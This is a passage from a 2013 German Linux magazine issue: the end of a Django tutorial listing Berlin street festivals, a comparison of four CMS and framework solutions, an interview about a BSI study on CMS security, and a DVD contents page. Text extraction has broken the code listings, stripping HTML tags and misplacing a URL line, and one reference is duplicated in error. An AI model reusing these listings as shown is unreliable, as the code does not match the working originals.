02 from django.utils import timezone
03
04 from .models import StrassenFest
05
06 class StrassenFestList(ListView):
07 def get_queryset(self):
08 today = timezone.now()
09 return StrassenFest.objects.filter(von__year=today.year,
von__month=today.month).order_by('von')
Listing 5: »strassenfest_list.html«
01 {% extends 'base.html' %}
02 {% block content %}
03
04
05
06 {% for data in object_list %}
07
08
09 {{ data.bezeichnung }}
10 Von {{ data.von|date:"d.m.Y" }} bis
{{ data.bis|date:"d.m.Y" }}
11
12
13 {% endfor %}
14
15
16 {% endblock %}
17

verwendet. Diese Methode überprüft,
ob die Daten grundsätzlich einem Format
entsprechen, mit dem Django umgehen
kann. So überprüft Django beispielsweise,
ob ein »DateField« auch
tatsächlich mit einem Datum befüllt ist.
Eine andere Möglichkeit bestünde darin,
Formular-Klassen zu verwenden, die es
erlauben, Input beliebig zu validieren.
Im nächsten Schritt lässt sich endlich der
Management-Befehl ausführen:
python manage.py get_data
Allerdings ruft der Befehl jetzt noch Fehlermeldungen
hervor, weil zunächst ein
passendes Datenbank-Modell fehlt und
Django aus diesem Grund die Daten nicht
ablegen kann. Dieses Modell definiert die
Datei »models.py«, die Listing 3 zeigt.
Modellbaukasten
Djangos Datenbankmodelle sind im Prinzip
selbsterklärend. Sie bestehen aus einer
Klasse, die mindestens von »models.
Model« erbt und ansonsten aus Attributen
und Methoden besteht. Die Attribute
lehnen sich an die Originalbezeichnungen
der Datenquelle an und sind den
passenden Feldern zugeordnet.
Der Vorteil korrekter Felder offenbart sich
beim Einsatz von Django-Forms: Diese
validieren automatisch Daten vor dem
Einfügen und geben notfalls passende
Fehlermeldungen aus. Das Attribut »api_
id« bekommt zusätzlich den Parameter
»blank=True« übergeben, der dafür
sorgt, dass dieses Feld auch leer bleiben
darf. Hat der Entwickler das Modell
schließlich implementiert, in die Konfiguration
der App eingetragen und über
python manage.py syncdb
die Datenbank synchronisiert, sollte der
Management-Befehl erfolgreich arbeiten
und die Datensätze eintragen.
Logik bitte!
Als Nächstes geht es um die Logik, mit
der Django die Daten in den Templates
präsentiert. Diese legt die Datei »views.
py« (Listing 4) fest (Abbildung 1). Hier
treten nun die bereits angesprochenen
Class-based Views in Gestalt einer »List-
View« ins Rampenlicht. Das ergibt Sinn,
da Django eine Liste von Elementen anzeigen
soll. Für die Anzeige einzelner
Elemente käme etwa eine »DetailView«
zum Zuge. Das verdeutlicht auch den
Vorteil von CBV: Gerade mal drei Zeilen
Code sind nötig, um die erste Liste
mit Daten anzuzeigen. Sehr viel passiert
dabei im Hintergrund. Beim FBV-Ansatz
muss sich der Entwickler hingegen selbst
um viele Dinge kümmern und kann so
nicht immer dem DRY-Ansatz („Don’t
Repeat Yourself“) folgen.
In der View selbst wird zuerst das heutige
Datum bestimmt. Das ist wichtig,
denn das Template soll später nur die
Daten des aktuellen Monats anzeigen.
Dann legt der Entwickler für die Klasse
ein »queryset« fest. Das versammelt alle
Elemente, auf die das Template später Zugriff
erlaubt. Dazu ruft Django die Klasse
des Modells »StrassenFest« auf, das gerade
implementiert wurde.
Abbildung 1: Die vom Autor genutzte IDE heißt Pycharm, im Bild zu sehen ist die geöffnete Datei »views.py«.

Titelthema
www.linux-magazin.de Django 11/2013
42
01 from django.conf.urls import patterns, include, url
02 from .views import StrassenFestList
03
04 urlpatterns = patterns('',
05 url(r'^$', StrassenFestList.as_view(),
06 )
07
01 {% extends 'base.html' %}
02 {% block content %}
03
04 {% csrf_token %}
05
06
07
08
09
10
11
12 {% for data in object_list %}
13
14
15 {{ data.bezeichnung }}
Die Methode »objects.filter()« schränkt
die aus der Datenbank ausgegebenen
Elemente ein, mit dem Parameter »von__
year« auf die Elemente aus dem aktuellen
Jahr. Das Gleiche gilt für die Monate mit
»von__month«. Der Befehl »order_by()«
ordnet die Elemente.
Mehr ist in den Views anfangs nicht zu
tun. Django sucht nun automatisch nach
dem passenden Template, in diesem Fall
unter »templates/streetparty/strassenfest_list.html«.
Es kann aber über das
Attribut »template_name« auch eine andere
Vorlage wählen. Die Standardauswahl
basiert auf dem Namen der Klasse
und der hier benutzten Class-based View.
Zusätzlich muss der Django-Entwickler
den Ordner »templates/streetparty« im
»streetparty«-Verzeichnis anlegen.
Selbstdarsteller
Anschließend knöpft er sich die Datei zur
Darstellung im Browser vor (Listing 5).
In »strassenfest_list.html« steht die Liste
»object_list« zur Ausgabe in Django bereit.
Die Framework-eigene Template Engine,
die in den Templates ihren Auftritt
hat, lässt sich bei Bedarf austauschen.
Django-Projekte bauen ihre Templates
meist modular auf, diese Möglichkeit
bietet auch die Template Engine.
Im Beispiel fußt das Template auf einem
Basis-Template, von dem es über den
Befehl »{% extends %}« erben kann.
Im Basis-Template lassen sich dann mit
»{% block %}« an verschiedenen Stellen
im Markup Blöcke anlegen, etwa für In-
16 Von {{ data.von|date:"d.m.Y" }} bis {{ data.bis|date:"d.m.Y" }}
17
18
19 {% endfor %}
20
21
name='feste'),
22 {% endblock %}
Listing 6: »urls.py«
Listing 7: »strassenfest_list.html«
halte oder einzelne CSS-Definitionen. In
der Datei »strassenfest_list.html« gibt am
Anfang eine Liste die Feste aus. Dank des
For-Operator durchläuft das Konstrukt
alle Elemente aus »object_list«. Das erlaubt
den Zugriff auf einzelne Elemente,
in diesem Fall Objekte, zum Beispiel auf
das Feld »bezeichnung« über »{{ data.
bezeichnung }}«.
Um das Datum in einem lesbaren Format
darzustellen, benutzt Zeile 10 den »date«-
Filter. Django bietet standardmäßig verschiedene
Filter und Tags für Templates
an, die man selber erweitern kann.
Nach der Logik passt nun auch die Darstellung.
Fehlt noch die URL zum Aufrufen
im Browser, also das Routing. Diese
URLs muss Django fast immer neu festlegen,
unter »streetparty/urls.py« befinden
sich die URL-Definitionen für die App
(Listing 6).
Das Beispiel braucht nur eine URL, die
sich aus der relativen URL, der aufzurufenden
View und dem Namen der URL
zusammensetzt. Die URL selbst kann mit
Hilfe regulärer Ausdrücke Parameter abfangen
und an die View weitergeben. Der
Name ist nötig, um nicht direkt die URL
in die Templates schreiben zu müssen.
Django soll sich die URL selbst zusammenbauen,
denn so lässt sie sich ohne
Nachteile für die Nutzbarkeit ändern.
Verwendet der Entwickler CBV, muss er
eine CBV-Methode aufrufen, konkret die
Methode »as_view()«. Ruft er das Beispiel
jetzt im Browser auf, müsste sich unter
der entsprechenden URL eine Liste mit
Veranstaltungen in diesem Monat befinden
(Abbildung 2).
Soll der Nutzer nur die Veranstaltungen
in einem bestimmten Zeitraum finden,
also zwischen zwei Daten, kommen der
Einfachheit halber zwei Input-Felder vom
Typ »date« und mit den Namen »von«
und »bis« zum Einsatz, die Listing 7 ergänzt.
Diese Felder sollten sich in einem
Formular befinden. Als Formular-URL
Listing 8: »views.py«
01 # überschreibt Klasse aus Listing 4
02 class StrassenFestList(ListView):
03 def get_queryset(self):
04 qs = StrassenFest.objects.order_by('von')
05 form_data = self.request.POST
06 if 'von' in form_data and 'bis' in form_data:
07 qs = qs.filter(von__gte=form_data['von'], bis__lte=
form_data['bis'])
08 else:
09 today = timezone.now()
10 qs = qs.filter(von__year=today.year, von__month=
today.month)
11 return qs
12
13 def post(self, *args, **kwargs):
14 return self.get(*args, **kwargs)

Abbildung 2: Django zeigt nun eine Liste der geplanten Feste an. Diese lässt
sich jetzt in das passende Stylesheet der Webseite einbetten.
dient der URL-Befehl der Template Engine:
»{% url "feste" %}«. Das Formular
braucht aus Sicherheitsgründen ein
CSRF-Token [6], das der Programmierer
mit »{% csrf_token %}« einbindet. Vergisst
er dies, nimmt Django die »POST«-
Daten nicht an – ein Sicherheitsaspekt,
an dem er nicht vorbei kommt.
Das Formular nutzt dieselbe URL wie für
die eigentliche Seite, um die gleiche View
aufzurufen. Will der Entwickler die Daten
verarbeiten, muss er die View erweitern,
indem er die Klasse »StrassenFestList()«
überschreibt (Listing 8).
Das Skript ruft die »post()«-Methode der
Klasse »ListView« auf, sobald »POST«-
Daten übergeben werden. Letztere speichert
ein Request-Objekt und macht sie
so für die Methode nutzbar. Das Beispiel
verwendet einen neuen Filter. Der Befehl
»von__gte« steht für „Gib mir alle Elemente,
die größer als oder gleich dem
folgenden Datensatz sind“. Der Datensatz
ist das Anfangsdatum des Filters. Beim
Enddatum verhält es sich ähnlich, »lte«
steht hier für kleiner oder gleich. Zeile 13
und 14 übergeben die gefilterten Daten
noch dem Kontext und rufen die Methode
auf, die das Template dann rendert.
Fazit
Django ist durch seinen modularen Aufbau
eher für große Projekte konzipiert,
dank der CBV und der automatisierten
Logiken dahinter lassen sich aber auch
kleinere Projekte mit wenig Entwicklungsaufwand
umsetzen. Hält sich der
Entwickler an die Vorgaben
und Anregungen
der Django-Dokumentation
und setzt diese
effektiv ein, kann er
stabile Anwendungen
mit allen Django-Features
entwickeln. Dies
verlangt einen hohen
Lernaufwand, aber
die CBV vermeiden
unnötigen Boilerplate-
Code. Der Entwickler
gewinnt Flexibilität
und Sicherheit.
Aufgrund seiner Modularität
lässt sich das
Beispiel auch leicht in
andere Projekte integrieren,
eine große Stärke von Django. Hinter
Django steht eine große Community,
die für fast jeden Anwendungszweck
Tools und Plugins bereithält. Eine Schwäche
liegt im langwierigen Setup-Prozess
für neue Projekte: Wild drauf los zu programmieren,
ist mit Django schwierig,
wie wohl mit den meisten professionellen
Frameworks. Wer es kleiner mag, sollte
einen Blick auf die Django-Alternative
Flask [7] werfen. (kki)
n
Infos
[1] Django-Dokumentation:
[https:// docs. djangoproject. com/ en/ 1. 5/]
[2] Two Sccops of Django:
[https:// django. 2scoops. org]
[3] Django-Tutorial:
[https:// docs. djangoproject. com/ en/ dev/​
intro/ tutorial01/]
[4] Datenquelle: [http:// daten. berlin. de/​
datensaetze/ berliner‐und‐brandenburgervolks‐und‐stra%C3%9Fenfeste‐2013]
[5] Berliner Bierfestival:
[http:// www. bierfestival‐berlin. de]
[6] CSRF: [https:// de. wikipedia. org/ wiki/​
Cross‐Site‐Request‐Forgery]
[7] CSRF: [https:// de. wikipedia. org/ wiki/​
Cross‐Site‐Request‐Forgery]
[8] Listings zum Artikel:
[http:// www. linux‐magazin. de/ Ausgaben/​
Listings/ 11/django]
Der Autor
Sven Schannak ist als Unternehmer und leidenschaftlicher
Softwareentwickler an der wundervollen
Ostsee tätig.

Titelthema
www.linux-magazin.de Bewertung 11/2013
46
Die vier vorgestellten Lösungen im Direktvergleich
Sieg programmiert
Viele Wege führen ans Ziel, das gilt auch für die Wahl von Software für die Website. Wer aber zuerst ankommt
und unterwegs Angenehmes erlebt, ist klar im Vorteil. Der Versuch einer Podest-Zuweisung. Mathias Huber
© kallejipp, photocase.com
Durchs Ziel haben sie es alle geschafft:
Sowohl mit Contao und Magnolia CMS
als auch mit Rails und Django haben
die beauftragten Experten eine funktionierende
Veranstaltungsübersicht produziert.
Der Unterschied besteht darin,
mit welchen Mitteln und mit welchem
Aufwand sie es getan haben.
Stilfrage
Differenzen zeigen sich aber auch im Arbeitsstil:
Dass beispielsweise hinter Magnolia
CMS das Räderwerk eines Unternehmens
arbeitet, zeigte sich rasch. Die
Firma beauftragte einen In-House-Entwickler,
der innerhalb von zwei Wochen
eine ansprechende Lösung produzierte
und an die Redaktion schickte. Daneben
war er der einzige, der neben dem Code
auch noch mehrere Seiten Dokumentation
einreichte, zudem eine vorbereitete
Tomcat-Instanz zum Ausprobieren.
Der Ruby-on-Rails-Mann installierte seine
Anwendung dafür flugs öffentlich auf
der Plattform Heroku,
publizierte den Code
auf Github und unterzog
ihn den ständigen
Tests des freien Con-
tinuous-Integration-
Tools Travis.
Möchte man den Absolventen
eine Rangfolge
zuweisen, bietet
es sich an, erreichte
Features abzuhaken.
Magnolia CMS hat
die Daten erfolgreich
importiert, verwendet
einen Cache und
bietet dem Anwender
ein hübsches Kalender-Widget.
Dazu
kommt jedoch noch ein besonderes Feature:
Sobald die Daten im Java Content
Repository gespeichert sind, lassen sie
sich über die Redaktionsoberfläche auch
bearbeiten, sperren oder freigeben. Diesen
im Testfeld einmaligen Zusatznutzen
honoriert die Redaktion symbolisch mit
dem ersten Platz.
Das einzige, was man Magnolia ankreiden
könnte, ist die etwas wortreiche
Syntax der Programmiersprache Java. Da
fassen sich die beiden Kandidaten Rails
mit Ruby und Django mit Python merklich
kürzer. Sie haben überhaupt einiges
gemeinsam, denn sie folgen beide der Architektur
Model-View-Controller (MVC)
und verwenden einen Object-Relational-
Mapper (ORM), der die Brücke zwischen
SQL-Datenbank und objektorientierter
Programmierung schlägt.
Ruby kommt mit weniger Bearbeitung
von Konfigurationsdateien aus, da es
stärker nach dem Motto „Convention
over Configuration“ ausgerichtet ist.
Wenn ohnehin schon alle Komponenten
vorgeschriebene Namen oder zumindest
Namensmuster haben, bleibt nicht mehr
viel zu konfigurieren. Doch nicht allein
deshalb hat Ruby on Rails die Nase ein
wenig vor Django. Der Rails-Entwickler
hat in einem beherzten Coup gewagt,
ganze Komponenten auszutauschen: Das
Ruby-Framework dient ihm nur zum Umsetzen
eines Datenservers, die Ansicht
übernimmt Angular.js in Javascript. Dazu
verwendet er noch ein Template-System
seiner Wahl, verwaltet die Javascript-
Bibliotheken mit dem Paketmanager
Bower – und liefert die Tests für seine
Anwendung gleich mit. Eine beeindruckende
Demonstration von Flexibilität
und Erweiterbarkeit. Das hätte fast für
den ersten Platz gereicht, auf jeden Fall
aber für die Nummer zwei.
Schnell, aber zu Fuß
Beim PHP-basierten Contao brauchte
der Entwickler zwar nur einen einzigen
Tag für seine Lösung, aber es waren insgesamt
elf Dateien für die Umsetzung
erforderlich, nur bei einzelnen könnte
ein mitgelieferte Generator helfen. Das
abgedruckte Listing zeigt, dass er auch
Selbstverständliches wie den Speicherort
der CSS-Stylesheets im Code angeben
musste. Klug ist dagegen die Idee, den
Eventkalender als Erweiterung zu implementieren
– dafür umso enttäuschender,
dass es keinen Installationsmechanismus
für das fertige Modul gibt.
Wer schließlich das so genannte Template
für Contao betrachtet, vermisst schmerzlich
die Trennung von Präsentation und
Logik: Hier mischt sich eine HTML-Tabelle
mit waschechtem PHP-Code. Und
schließlich folgt noch ein regelrechtes
K.-o.-Kriterium: Das Fehlen aktueller,
brauchbarer Dokumentation. n

Titelthema
www.linux-magazin.de Interview 11/2013
48
BSI-Studie zur CMS-Sicherheit
Security-Matrix
Für das deutsche Bundesamt für Sicherheit in der Informationstechnik (BSI) haben die Init AG für digitale
Kommunikation und das Fraunhofer SIT die „Sicherheitsstudie Content Management Systeme“ angefertigt.
Über diese hat das Linux-Magazin mit einem der Autoren, Christian Breitenstrom, gesprochen. Kristian Kißling
Die Studie [1], auch zu finden auf der
Delug-DVD, überprüft fünf quelloffene
CMS anhand von etwa 80 Einzelkriterien
auf ihre Sicherheit. Auf Basis der positiven
(+), negativen (-) und vereinzelt
neutralen (0) Bewertungen entstand am
Ende eine vergleichende, CMS-übergreifende
Matrix. Das Linux-Magazin befragt
dazu Christian Breitenstrom, Senior Software
Entwickler bei der Init AG.
Linux-Magazin: Wer hat alles an der CMS-Studie
mitgewirkt?
Christian Breitenstrom: Neben meinem Arbeitgeber
war auch das Fraunhofer SIT
daran beteiligt, das unter anderem Sicherheitsuntersuchungen
und Penetrationstests
von Systemen vornimmt, die
IT-Grundschutzschulungen für das BSI
umsetzt und eine eigene Public-Key-Infrastruktur
für die Fraunhofer Gesellschaft
betreibt – ich schätze für über 20 000 Personen.
Insofern hat das Fraunhofer SIT
im Bereich Sicherheitsforschung einen
sehr guten Einblick in Vorgehensmodelle
und Methoden, weiß, wie man Software
testet und bewertet.
Linux-Magazin: Wie ist die Init AG für digitale
Kommunikation dazu gekommen?
Christian Breitenstrom: Wir entwickeln seit
über 15 Jahren Portale und Websites für
Regierungen und Verwaltungen, NGOs
und die Wirtschaft. In vielen dieser Projekte
setzen wir CMS ein.
Da wir viele Websites in unserem BSIzertifizierten
Rechenzentrum betreiben,
haben wir einen ganz guten Vergleich der
eingesetzten CMS. Deswegen wissen wir,
wie ein gut aufgesetztes Patch-Management
funktioniert, welche Probleme und
Fragen dabei immer wieder auftauchen
und welche Fragen daraus resultieren.
Wir blicken, im Unterschied zum Fraunhofer
SIT, eher mit der Anwenderbrille
auf IT-Sicherheit.
Abbildung 1: Plone unterscheidet sich nicht nur in seiner Architektur von den anderen Systemen.
© Quelle: Sicherheitsstudie CMS
Linux-Magazin: An wen richtet sich diese Studie?
Christian Breitenstrom: Wir haben gemeinsam
mit dem BSI definiert, dass die Zielgruppe
aus Personen besteht, die ein
Mindestmaß an technischem Verständnis
mitbringen, die also in der Regel die
Entscheider sind, die in ihren Organisationen
Systeme auswählen und dafür verantwortlich
sind, dass diese über Jahre
hinweg sicher laufen.
Linux-Magazin: Konkret untersucht die Studie
fünf CMS, nämlich Typo 3, Plone, Wordpress,
Drupal und Joomla. Warum nur fünf, wenn es um
Orientierung im CMS-Dschungel geht?
Christian Breitenstrom: Ausschlaggebend
war für das BSI auch die Budgetfrage. Jedes
weitere System, das man untersuchen
will, kostet. Das Budget war vorgegeben,
also musste man die Zahl begrenzen.
Linux-Magazin: Warum haben Sie genau diese
fünf Vertreter ausgewählt?
Christian Breitenstrom: Wir haben uns auf
die fünf Systeme konzentriert, die aus
BSI-Sicht in Deutschland sehr verbreitet
sind, da zur Zielgruppe vor allem deutsche
Entscheider gehören, nicht internationale.
Die nächste Frage ist, warum
nur Open-Source-Systeme und keine
kommerziellen?
Linux-Magazin: Genau.
Christian Breitenstrom: Das haben wir uns
natürlich auch überlegt. Es ist nicht gerechtfertigt,
die Studie auf genau die Systeme
und genau diese Anzahl zu begrenzen.
Man muss vielmehr eine Methodik
und Kriterien entwickeln, nach denen
man andere Systeme genauso bewerten
kann, wie wir es hier getan haben.
Dann könnte ein Auftraggeber, der ein
von uns nicht bewertetes System verwenden
möchte, eine eigene Evaluation
vornehmen und das Ergebnis im Sinne
von Open Source und Open Knowledge

© Quelle: Sicherheitsstudie CMS
Interview 11/2013
Titelthema
www.linux-magazin.de
49
Abbildung 2: Das sind nur einige der Kriterien aus dem ITIL-Bereich, die im Rahmen der Studie bewertet wurden.
einfach dazustellen. Kommt dabei eine
genügend große Anzahl von bewerteten
Open-Source-Systemen zusammen,
müssten kommerzielle Hersteller ebenso
ein Interesse daran haben, da mit aufzutauchen.
Ein unabhängiger Dritter könnte
dann so eine Studie durchführen.
Linux-Magazin: Plone (Abbildung 1) weicht ein
bisschen vom Standard ab. Sie haben eine Tabelle
in der Studie, relativ am Anfang, welche
den Marktanteil von Plone auf 0,37 Prozent
schätzt, was sehr wenig ist im Vergleich zu den
anderen CMS. Warum haben Sie Plone mit in die
Studie genommen?
Christian Breitenstrom: 0,37 Prozent sind
nicht viel, aber es gibt mindestens ein
Bundesministerium, das Plone verwendet,
und einige regionale Sites tun es
auch. Auf die Verwaltung bezogen ist es
nicht unwichtig.
Linux-Magazin: Die untersuchten Kriterien
stammen aus dem ITIL-Bereich [2], also Service
Design, Service Transition, Service Operation.
Nach welchem Schema haben Sie die einzelnen
Kriterien (Abbildung 2) gefunden, die Sie dort
bewerten, also auch die Unterkriterien innerhalb
der drei Bereiche?
Christian Breitenstrom: Die Frage war natürlich,
welche Kriterien sind so allgemein,
dass sie nicht nur für die Systeme gelten,
die wir jetzt untersuchen. Wir haben
anfangs nicht nur PHP- oder Python-
Systeme betrachtet, deswegen sind auch
einige Kriterien dabei, die Java-Systeme
berücksichtigen. Wie wir dabei vorgegangen
sind? Es gab verschiedene Optionen,
etwa Open SAMM [3], das offene
Software Assurance Maturity Model. Die
Wahl fiel auf ITIL, weil es eben nicht nur
die Software betrachtet, sondern auch
die Entwicklung der Software, ihre Konzeption,
das Deployment, das Leben damit
und ihre Entsorgung. Wenn man ein
CMS über Jahre hinweg sicher betreiben
möchte und vor einer Vergabeentscheidung
steht, muss man all diese Aspekte
berücksichtigen.
Linux-Magazin: Einige der Kriterien definieren
Sie als Ausschlusskriterien, ihr Fehlen als „undenkbares
Manko“. Sie haben auf Seite 76 der
Studie geschrieben, dass kein System die Trennung
von fachlichen Daten und Systemdaten
beherrscht. Wäre das nicht ein Ausschlusskriterium
für öffentliche Systeme gewesen, die mit
personenbezogenen Daten arbeiten?
Christian Breitenstrom: Nein, das ist nicht
unbedingt ein Ausschlusskriterium. Wenn
man es weiß und es transparent ist, muss
sich der zuständige Security Engineer
überlegen, welche anderen Elemente er
etabliert, um das Manko zu kompensieren.
Er kann aber nicht, wie das oft geschieht,
schlicht sagen: „Dieses Security-
Feature gibt es nicht? Na gut, dann brauchen
wir es nicht umzusetzen.“
Linux-Magazin: Was kann man denn konkret tun,
wenn diese Trennung zwischen fachlichen Daten
und Systemdaten komplett fehlt?
Christian Breitenstrom: Manche Datenbanksysteme
ermöglichen eine Komplettverschlüsselung
der Daten. In diesem Fall
muss man entweder alles, was in der Datenbank
steht, oder die Partitionen selbst
verschlüsseln. Auch muss man überlegen,
ob eine Verschärfung des Konzepts
für Benutzer-Rollenrechte nötig ist.
Was wir natürlich für sehr gut hielten,
das wäre, wenn man bestimmte Bereiche
der Daten tatsächlich vor der Anwendung
schon verschlüsselt, bevor diese sie in
die Datenbank schreibt. Dazu gehören
etwa Logging-Informationen, die später
für Audits verwendet werden, wenn der
Anwender das Kriterium der Nachvollziehbarkeit
erfüllen muss. Diese Loggings
erhalten oftmals Informationen, die aus
datenschutzrechtlicher Sicht nicht in falsche
Hände fallen dürfen.
Wir hätten uns natürlich gewünscht,
dass es ein Feature gibt, mit dessen Hilfe
ein Anwendungsentwickler sagen kann:
„Hier, das sind meine besonders wichtigen
Daten, die behandle mal besonders
umsichtig.“ Das gibt es aber momentan
nicht.
Linux-Magazin: Die Studie sagt, dass kein CMS
eine schlüsselfertige Lösung mitbringt, wenn
es um Sicherheit geht. Das heißt, der Anwender
muss im Prinzip bei allen erst mal nachbessern
und konfigurieren. Hat sich da irgendwas herauskristallisiert,
was Sie empfehlen im Umgang
mit CMS?
Christian Breitenstrom: Es ist ganz wichtig,
dass man jetzt nicht sagt, System X ist
besser als A, B oder C und deswegen

Titelthema
www.linux-magazin.de Interview 11/2013
50
kann man System X einfach so installieren
und betreiben, wie es ist. Wir empfehlen,
eine Erstinstallation durch Security-Profis
überprüfen zu lassen. Das dauert nicht
lange, weil die genau wissen, wohin sie
gucken müssen.
Das zweite war, dass man die Systeme
professionell betreibt. Alle Systeme,
auch wenn einige sicherer sind als andere,
sollte der Anwender mindestens
15 Minuten am Tage monitoren. Über
die 15 Minuten lässt sich streiten, aber
wichtig ist, dass wir sagen: täglich. Treten
Schwachstellen auf und werden Security
Fixes ausgeliefert, dann gibt es auch Exploits,
die diese Schwachstellen automatisiert
austesten. Es reicht nicht, alle drei
Wochen mal nachzusehen.
Linux-Magazin: Hilft es, wenn der Betreiber von
den Standards abweicht, indem er den Standarduser
nicht »Admin« nennt, die Namen der Datenbanktabellen
modifiziert und gleich bei der
Grundkonfiguration einige Dinge im System ändert?
Oder erschwert das eher den Umgang mit
so einem CMS?
Christian Breitenstrom: Das kommt auch
wieder auf das System an: In der Regel
hilft es schon eine Menge. Es geht ja um
eine Verteidigung in der Tiefe und jede
Schwierigkeit, die ich einbaue, bewahrt
mich vielleicht einige Minuten länger davor,
dass ein Angreifer meine Hinterlist
entdeckt und bekämpft. Sobald wir aber
in den Bereich Security by Obscurity kommen,
hilft mir das überhaupt nicht lange.
Insofern muss man im Einzelfall gucken,
ob das angebracht ist oder nicht.
Linux-Magazin: Was genau meinen Sie mit „Verteidigung
in der Tiefe“, in der Studie taucht es ja
einige Male auf?
Christian Breitenstrom: Das ist eines der
grundlegenden Prinzipien. Contentmanagement-Systeme
sind weithin verbreitet.
Tritt dort ein Fehler auf, der sich
ausnutzen lässt, sind Hunderte oder Tausende
von Websites betroffen. Das heißt
also, es ist eigentlich eine Monokultur.
Habe ich nicht rechtzeitig gepatcht oder
gibt es einen Zero-Day-Exploit, den noch
niemand gemeldet hat, muss ich mindestens
eine, wenn nicht zwei oder drei
Rückfalllinien haben, um meine Systeme,
meine innere Infrastruktur, gegen diese
Angriffe zu schützen.
In diesem Fall kann ich mir überlegen,
welche Security-Kontrollen ich benutzen
will, um etwa meine Datenbankserver
© Quelle: Sicherheitsstudie CMS
Abbildung 3: Durchschnittliche Verteilung der Schwachstellentypen unter allen CMS.
vor dem Contentmanagement-Server
zu schützen, der gegebenenfalls schon
übernommen wurde. Wenn ich ein CMS
einsetze, muss ich also sehr viel mehr
Ideenreichtum, Kreativität, Know-how
und Untersuchungen in die Konzeption
meiner Website und meiner Infrastruktur
stecken. Ich darf mich nicht nur darüber
freuen, dass die Kosten reduziert sind,
sondern muss meine Infrastruktur besser
strukturieren, als wenn ich eine Individualentwicklung
verwende.
Linux-Magazin: Dann haben Sie Schwachstellenzählungen
vorgenommen (Abbildung 3). Sie
haben in einem bestimmten Zeitraum, 2010 bis
2012, die Schwachstellen dieser verschiedenen
Systeme untersucht. Was hat diese Erhebung Ihrer
Meinung nach gebracht?
Christian Breitenstrom: Sie gibt eine grobe
Orientierung, insofern man feststellen
kann, dass es zwar Unterschiede gibt,
diese aber nicht in Zehner- und Hunderter-Potenzen
bestehen. Man kann sagen,
dass die Open-Source-Systeme – ganz
grob betrachtet – in einer Liga spielen.
Hätte sich herausgestellt, dass es bei einem
System sehr viel mehr Bugs gibt als
bei anderen, dann wäre das schon eine
Aussage gewesen.
Linux-Magazin: Oder das CMS hat einfach besonders
viele Erweiterungen oder besonders viele
Nutzer?
Christian Breitenstrom: In diesem Fall würde
man schauen müssen, ob es tatsächlich
nur die Vielzahl von Erweiterungen ist
oder ob es einen grundlegenden Architekturmangel
gibt, der immer wieder
dazu führt, dass es kompliziert wird, für
dieses System sichere Erweiterungen zu
bauen.
Eine Schwierigkeit besteht darin, dass
die erkannten Schwachstellen natürlich
von der Anzahl der Tests, von tatsächlichen
Hacks sowie von der Fähigkeit des
Security-Teams abhängen, die Schwachstellen
zu erkennen. Wir mussten beispielsweise
im Nachhinein feststellen,
dass bei Plone sehr viele Schwachstellen
zwar gefixt und auch die CVE-Numbers
reserviert wurden, aber die zugehörigen
CVEs dann nicht im Verzeichnis auftauchen.
So reflektierten die dortigen Zahlen
schon mal nicht die Zahlen, die tatsächlich
gemeldet waren.
Linux-Magazin: Es gibt bekanntlich die Möglichkeit,
statische Code-Analysen vorzunehmen,
zum Beispiel mit Coverity. Die haben ziemlich
viele FOSS-Projekte untersucht, aber es ist keines
von diesen CMS dabei. Wäre es nicht auch
eine Option gewesen, solche Tests in die Studie
mit aufzunehmen?
Christian Breitenstrom: Das Problem von
Coverity ist, dass die momentan kein
PHP unterstützen, insofern sind diese
Systeme nicht dabei. Aber ja natürlich,
statische Quellcode-Analysen sind auch
eine der wichtigen Maßnahmen, die wir
empfohlen haben.
Linux-Magazin: Gab es für Sie eine Überraschung
in den Ergebnissen der Studie?
Christian Breitenstrom: Überraschungen gab
es schon: Was das Patch-Management anbelangt,
habe ich mich über einige Dinge
gefreut, die ich so noch nicht kannte.
Etwa darüber, dass die Unterstützung der
Administratoren schon so weit geht, wie
es momentan der Fall ist, und dass man
eigentlich relativ gut informiert wird,
wenn Patches vorliegen.
n
Infos
[1] CMS-Studie im Netz: [https:// www. bsi.​
bund. de/ DE/ Publikationen/ Studien/ CMS/​
Studie_CMS. html]
[2] Information Technology Infrastructure Library:
[http:// www. itil. org/ en/ vomkennen/​
itil/ index. php]
[3] Open Software Assurance Maturity Model:
[http:// www. opensamm. org]

In eigener Sache: DELUG-DVD
Privatsphäre, Debconf, Java
Einführung 12/2010 11/2013
Software
Die DELUG-Käufer bekommen eine randvolle DVD: Auf der Silberscheibe finden sich die neueste Version der
Distribution Ubuntu Privacy Remix, zahlreiche Tools, Tipps und Tricks zu den Artikeln, eine virtuelle CMS-Appliance
von Bitname, ein kostenloses E-Book von Galileo, Debian-Videos und viel Software. Markus Feilner
www.linux-magazin.de
51
Inhalt
52 Bitparade
Wer Texte mit Editoren formal nachbearbeiten
möchte, setzt auf XML.
58 Git-Annex
Git-Annex bietet freie und sichere Synchro
nisationsdienste für Linux-Anwender.
60 Tooltipps
Macchanger 1.6.0, Codesh 2.0.1, Enc 0.2,
Arp Scan 1.9, Cyberprobe 0.20 und Palaver
(August 2013) im Kurztest.
64 Ubuntu Privacy Remix
Am sichersten ist die einsame Insel! Wer
ins Internet will, braucht Extras.
Neben einem normalen Linux-Magazin
und dem Abonnement ohne Datenträger
gibt es die DELUG-Ausgabe mit Monats-
DVD, bei der die Redaktion den Datenträger
nach einem speziellen Konzept
zusammenstellt: In einer Art modularem
System enthält er Programme und Tools,
die in der jeweiligen Magazin-Ausgabe
getestet und besprochen werden. Zudem
gibt es nicht im Heft abgehandelte
Software, die die Redaktion besonders
empfiehlt, alles gebündelt unter einer
HTML-Oberfläche.
Abbildung 2: Kostenlos auf der DELUG-DVD: „Java 7
– Mehr als eine Insel“ von Christian Ullenboom.
Von der DVD bootet das Ubuntu-12.04-
Derivat Privacy Remix mit hohem Sicherheitsfaktor.
Ohne Verbindung zum Internet,
ohne Zugriff auf die Festplatte lässt
sich das Betriebssystem nur schwer manipulieren,
aber auch nur mit Einschränkungen
bedienen. Doch dafür glänzt es
mit durchdachten Lösungen, etwa wenn
es alle Daten grundsätzlich verschlüsselt
in Truecrypt-Containern speichert. Auf
der DVD liegt die Beta 1, die neueste
Entwicklerversion.
Nach Ubuntu Privacy Remix
gibt’s Debconf-Videos
Wer auf den Silberling mit dem Browser
zugreift, der findet im Hauptmenü zwei
Exklusiv-Einträge: Zum einen eine topaktuelle
Zusammenstellung der besten
Videos von der Debconf 2013. Da gibt
sich die Debian-Prominenz ein Stelldichein,
wenn etwa Bdale Garbee über die
Freedom Box (Abbildung 1), Moray Allan
über Pfade zu Debian, David McWherter
und Jimmy Kaplowitz über Debian auf
